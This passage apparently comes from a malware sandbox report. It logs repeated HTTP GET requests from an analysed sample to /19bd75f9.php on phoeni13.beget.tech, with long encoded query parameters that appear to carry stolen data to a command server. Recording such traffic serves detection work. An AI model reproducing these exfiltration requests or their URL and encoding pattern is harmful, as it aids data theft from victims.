JdXUqxUeBNUUnFERNJTWElkVCFTUnlEVL5kUGtEbKNjYEJ0ULNFaDJGbS5mYKpUaPlWVXJGa1UlVR50aJNXSTt0QkVUS4d2QJVlUsZVUaxWS2k0UaRnRtRlVCFjUpdXaJplSp9Ua0cVY0J1VRpHbtl0cJlWS2kUeSJkUsl0cJNEZwpURJBTWElEbOhVY5JkbjxmUuJmRCNUT4FUejNTOHpVdsJjVp9maJlnVtZVdsJjVpd3Uml2ctNmdsFDWzYVbUZXRykFcKhlW0Z0aJZTSTpVd50WZsFzVhBjSDxUaBRUT3FERNdXSp9Ua3dVWw40MidnSDxUaNhlWwY0RkRlQDpFbShVY1ZlRJRXQDpFbs1mWw50VadnTIlEM50GVp9maJ5mSzIWa3lWS0kFRNdHND50MwMET6lEVNNDND1EMJl2Tp1kMiNnSDxUaNZlVp9maJVjSIRWdWNjYqp0QMl2ctNmdsZUSzYVbUl2bqlUd5cVYuZVbjl2dplkcKNjYaJUekxWNrlkNJNVZwwmMZl2dplUNnRVT11kaNhHNp5EM0M0Tp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETp1kaNVTS61UNJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiczYyYzNkdTM1E2N2MjNlJWYyQzMiFWYzgzN2UTYkVGMiwiI2MmYlFDOiR2NwEzN5UjM3MTZxIDM4kzNlNzM1QDOyYzM1EmZyMWOxIiOiIjZ4QmN4UDNwI2MmZjMkhDN2UWZhJmN1UDOxEmZzUGOiwiIhJWZiNGZmFjMxADNlNmZ4gzN4EWZ5kTNzMmZ4YTNwkjMzEWN5gzYwIiOiAjNyIjN3EWNjlTNyY2NwgjNldDOyYWM5AzNmZjNmdzYis3W HTTP/1.1Accept: /Content-Type: text/csvUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: phoeni13.beget.techConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /19bd75f9.php?Dqk1RxxsMic=WB03Lj3Jl0wyHeC69XJobc5AEC9&1AEXzLSWm6uLx=rM4vu&u0tyZxa3GzzJjfRlwY95MqTCn=1TusFTSMmAQQ7BuYQwHklR0GafwylEg&3f032fcade01e4b9f042d13e86634631=QZzQWYzYWZiBTYyImN4ADMlZmNzgjZ2ITNwQDO0MWN4YzMmZ2YwkjN3ETOwQDM4YTM0gDN2YDN&365174fb29f58fe307a28d17c1f20f9c=gYhlTOiNDZiVzMjRzNxUWYiZDM2YjN1YWMmZGZ2QWO2UmMmRGO5M2M&4bb748b03ddc22e891199067c0479300=d1nIlZWMjZDOxIDZkBzNhZGMxMGMyEWN1YzYzADZwQGMlFjZ5cjYiNmYlJiOiIjZ4QmN4UDNwI2MmZjMkhDN2UWZhJmN1UDOxEmZzUGOiwiIhJWZiNGZmFjMxADNlNmZ4gzN4EWZ5kTNzMmZ4YTNwkjMzEWN5gzYwIiOiAjNyIjN3EWNjlTNyY2NwgjNldDOyYWM5AzNmZjNmdzYis3W&2cab15acb9861112e256b821d78413ec=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 HTTP/1.1Accept: /Content-Type: text/csvUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: phoeni13.beget.techConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /19bd75f9.php?Dqk1RxxsMic=WB03Lj3Jl0wyHeC69XJobc5AEC9&1AEXzLSWm6uLx=rM4vu&u0tyZxa3GzzJjfRlwY95MqTCn=1TusFTSMmAQQ7BuYQwHklR0GafwylEg&3f032fcade01e4b9f042d13e86634631=QZzQWYzYWZiBTYyImN4ADMlZmNzgjZ2ITNwQDO0MWN4YzMmZ2YwkjN3ETOwQDM4YTM0gDN2YDN&365174fb29f58fe307a28d17c1f20f9c=gYhlTOiNDZiVzMjRzNxUWYiZDM2YjN1YWMmZGZ2QWO2UmMmRGO5M2M&4bb748b03ddc22e891199067c0479300=d1nIlZWMjZDOxIDZkBzNhZGMxMGMyEWN1YzYzADZwQGMlFjZ5cjYiNmYlJiOiIjZ4QmN4UDNwI2MmZjMkhDN2UWZhJmN1UDOxEmZzUGOiwiIhJWZiNGZmFjMxADNlNmZ4gzN4EWZ5kTNzMmZ4YTNwkjMzEWN5gzYwIiOiAjNyIjN3EWNjlTNyY2NwgjNldDOyYWM5AzNmZjNmdzYis3W&2cab15acb9861112e256b821d78413ec=QX9JiI6IyNjJjN3Q2NxUTY3YzM2UmYhJDNzIWYhNDO3YTNhRWZwICLiUmZxMmN4EjMkRGM3EmZwEzYwITY1UjNjNDMkBDZwUWMmlzNiJ2YiVmI6IiMmhDZ2gTN0AjYzYmNyQGO0YTZlFmY2UTN4ETYmNTZ4ICLiEmYlJ2YkZWMyEDM0U2YmhDO3gTYllTO1MzYmhjN1ATOyMTY1kDOjBjI6ICM2IjM2cTY1MWO1IjZ3ADO2U2N4IjZxkDM3YmN2Y2NjJyes0nI5EjbJdXSq9ENJp2TzEkaJZTSpplMjpnTwcGVahXV65UMNpmTq5EVPFTVtl1aKdVTwkFRPtGZE9EakRkWop0VZlmRXpVbSJTTpdXaJxWQ61UavpWS1EEVNJzaqlVeFRkWopleONTSU1UNRRVTwEFVaBzYE9keNpXT3llaapmTE1EMBpnT5VkaadXSDxUaVNUTp9maJtmWE9UbCpWWyUkaZhmRX1EbGR1TxkkMZxmVq1EboRUT3VkaOFzY6lFbCRVWwU0VPlmStplMJNETpV1QNdXRqlkNJNUTxEFVNJTWE5kMFR1TrJleNdXStpleZpmWwcGVORTUX9kaGpmWwEEVZhmWt5EbWpmT0UleNl2dpl0LJl2TpFlaZNTVtllaWdVTqZleNJTQ650asRVTqp0RP1mUH5kMZJTT41EValXVU10MZRVT0k1RPNzZql0cJNUTp9maJlmUq5kakRVWpZ1VatmQEpFbadVW410RPBTWqplMnRVWpZUbNlXUX9UeJpWWxMGVZRTRUpVaKlXZ2k0UZBjRHJFMohlWpd3UOZTSDRWM5clW0x2RWdnVXp1cOxWSzlUeaVHbHNGbWdkYUpUaPlWTYRGMGdEZUxGSkBnWYFGMOdVUpdXaJlnVyoFa1cVWOJ0UihmSzoldKhUVp9maJNTOHpVdsJjVV5UVRl2dpl0TKl2TpBzVZpmSXpFWOhVYpdXaJplSp9UaV1mY2h2RjZnSzkFcxAzYwp0QMl2aD90Zj1mYwJESjxmUzU1ZNRkT4F0QixmUyImTClmTntGSiBXMXl1RCNkTyc3VaBTNXN1bBlWZJRWRJdXUqxUeBNUUnFERNJTWElkVCFTUnlEVL5kUGtEbKNjYEJ0ULNFaDJGbS5mYKpUaPlWVXJGa1UlVR50aJNXSTt0QkVUS4d2QJVlUsZVUaxWS2k0UaRnRtRlVCFjUpdXaJplSp9Ua0cVY0J1VRpHbtl0cJlWS2kUeSJkUsl0cJNEZwpURJBTWElEbOhVY5JkbjxmUuJmRCNUT4FUejNTOHpVdsJjVp9maJlnVtZVdsJjVpd3Uml2ctNmdsFDWzYVbUZXRykFcKhlW0Z0aJZTSTpVd50WZsFzVhBjSDxUaBRUT3FERNdXSp9Ua3dVWw40MidnSDxUaNhlWwY0RkRlQDpFbShVY1ZlRJRXQDpFbs1mWw50VadnTIlEM50GVp9maJ5mSzIWa3lWS0kFRNdHND50MwMET6lEVNNDND1EMJl2Tp1kMiNnSDxUaNZlVp9maJVjSIRWdWNjYqp0QMl2ctNmdsZUSzYVbUl2bqlUd5cVYuZVbjl2dplkcKNjYaJUekxWNrlkNJNVZwwmMZl2dplUNnRVT11kaNhHNp5EM0M0Tp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETp1kaNVTS61UNJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiczYyYzNkdTM1E2N2MjNlJWYyQzMiFWYzgzN2UTYkVGMiwiI2MmYlFDOiR2NwEzN5UjM3MTZxIDM4kzNlNzM1QDOyYzM1EmZyMWOxIiOiIjZ4QmN4UDNwI2MmZjMkhDN2UWZhJmN1UDOxEmZzUGOiwiIhJWZiNGZmFjMxADNlNmZ4gzN4EWZ5kTNzMmZ4YTNwkjMzEWN5gzYwIiOiAjNyIjN3EWNjlTNyY2NwgjNldDOyYWM5AzNmZjNmdzYis3W HTTP/1.1Accept: /Content-Type: text/csvUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: phoeni13.beget.tech
Source: global traffic	HTTP traffic detected: GET /19bd75f9.php?Dqk1RxxsMic=WB03Lj3Jl0wyHeC69XJobc5AEC9&1AEXzLSWm6uLx=rM4vu&u0tyZxa3GzzJjfRlwY95MqTCn=1TusFTSMmAQQ7BuYQwHklR0GafwylEg&3f032fcade01e4b9f042d13e86634631=QZzQWYzYWZiBTYyImN4ADMlZmNzgjZ2ITNwQDO0MWN4YzMmZ2YwkjN3ETOwQDM4YTM0gDN2YDN&365174fb29f58fe307a28d17c1f20f9c=gYhlTOiNDZiVzMjRzNxUWYiZDM2YjN1YWMmZGZ2QWO2UmMmRGO5M2M&4bb748b03ddc22e891199067c0479300=d1nIlZWMjZDOxIDZkBzNhZGMxMGMyEWN1YzYzADZwQGMlFjZ5cjYiNmYlJiOiIjZ4QmN4UDNwI2MmZjMkhDN2UWZhJmN1UDOxEmZzUGOiwiIhJWZiNGZmFjMxADNlNmZ4gzN4EWZ5kTNzMmZ4YTNwkjMzEWN5gzYwIiOiAjNyIjN3EWNjlTNyY2NwgjNldDOyYWM5AzNmZjNmdzYis3W&2cab15acb9861112e256b821d78413ec=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 HTTP/1.1Accept: /Content-Type: text/csvUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: phoeni13.beget.tech
Source: global traffic	HTTP traffic detected: GET /19bd75f9.php?Dqk1RxxsMic=WB03Lj3Jl0wyHeC69XJobc5AEC9&1AEXzLSWm6uLx=rM4vu&u0tyZxa3GzzJjfRlwY95MqTCn=1TusFTSMmAQQ7BuYQwHklR0GafwylEg&3f032fcade01e4b9f042d13e86634631=QZzQWYzYWZiBTYyImN4ADMlZmNzgjZ2ITNwQDO0MWN4YzMmZ2YwkjN3ETOwQDM4YTM0gDN2YDN&365174fb29f58fe307a28d17c1f20f9c=gYhlTOiNDZiVzMjRzNxUWYiZDM2YjN1YWMmZGZ2QWO2UmMmRGO5M2M&4bb748b03ddc22e891199067c0479300=d1nIlZWMjZDOxIDZkBzNhZGMxMGMyEWN1YzYzADZwQGMlFjZ5cjYiNmYlJiOiIjZ4QmN4UDNwI2MmZjMkhDN2UWZhJmN1UDOxEmZzUGOiwiIhJWZiNGZmFjMxADNlNmZ4gzN4EWZ5kTNzMmZ4YTNwkjMzEWN5gzYwIiOiAjNyIjN3EWNjlTNyY2NwgjNldDOyYWM5AzNmZjNmdzYis3W&2cab15acb9861112e256b821d78413ec=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 HTTP/1.1Accept: /Content-Type: text/csvUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: phoeni13.beget.tech
Source: global traffic	HTTP traffic detected: GET /19bd75f9.php?Dqk1RxxsMic=WB03Lj3Jl0wyHeC69XJobc5AEC9&1AEXzLSWm6uLx=rM4vu&u0tyZxa3GzzJjfRlwY95MqTCn=1TusFTSMmAQQ7BuYQwHklR0GafwylEg&3f032fcade01e4b9f042d13e86634631=QZzQWYzYWZiBTYyImN4ADMlZmNzgjZ2ITNwQDO0MWN4YzMmZ2YwkjN3ETOwQDM4YTM0gDN2YDN&365174fb29f58fe307a28d17c1f20f9c=gYhlTOiNDZiVzMjRzNxUWYiZDM2YjN1YWMmZGZ2QWO2UmMmRGO5M2M&4bb748b03ddc22e891199067c0479300=d1nIlZWMjZDOxIDZkBzNhZGMxMGMyEWN1YzYzADZwQGMlFjZ5cjYiNmYlJiOiIjZ4QmN4UDNwI2MmZjMkhDN2UWZhJmN1UDOxEmZzUGOiwiIhJWZiNGZmFjMxADNlNmZ4gzN4EWZ5kTNzMmZ4YTNwkjMzEWN5gzYwIiOiAjNyIjN3EWNjlTNyY2NwgjNldDOyYWM5AzNmZjNmdzYis3W&2cab15acb9861112e256b821d78413ec=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 HTTP/1.1Accept: /Content-Type: text/csvUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: phoeni13.beget.techConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /19bd75f9.php?Dqk1RxxsMic=WB03Lj3Jl0wyHeC69XJobc5AEC9&1AEXzLSWm6uLx=rM4vu&u0tyZxa3GzzJjfRlwY95MqTCn=1TusFTSMmAQQ7BuYQwHklR0GafwylEg&3f032fcade01e4b9f042d13e86634631=QZzQWYzYWZiBTYyImN4ADMlZmNzgjZ2ITNwQDO0MWN4YzMmZ2YwkjN3ETOwQDM4YTM0gDN2YDN&365174fb29f58fe307a28d17c1f20f9c=gYhlTOiNDZiVzMjRzNxUWYiZDM2YjN1YWMmZGZ2QWO2UmMmRGO5M2M&4bb748b03ddc22e891199067c0479300=d1nIlZWMjZDOxIDZkBzNhZGMxMGMyEWN1YzYzADZwQGMlFjZ5cjYiNmYlJiOiIjZ4QmN4UDNwI2MmZjMkhDN2UWZhJmN1UDOxEmZzUGOiwiIhJWZiNGZmFjMxADNlNmZ4gzN4EWZ5kTNzMmZ4YTNwkjMzEWN5gzYwIiOiAjNyI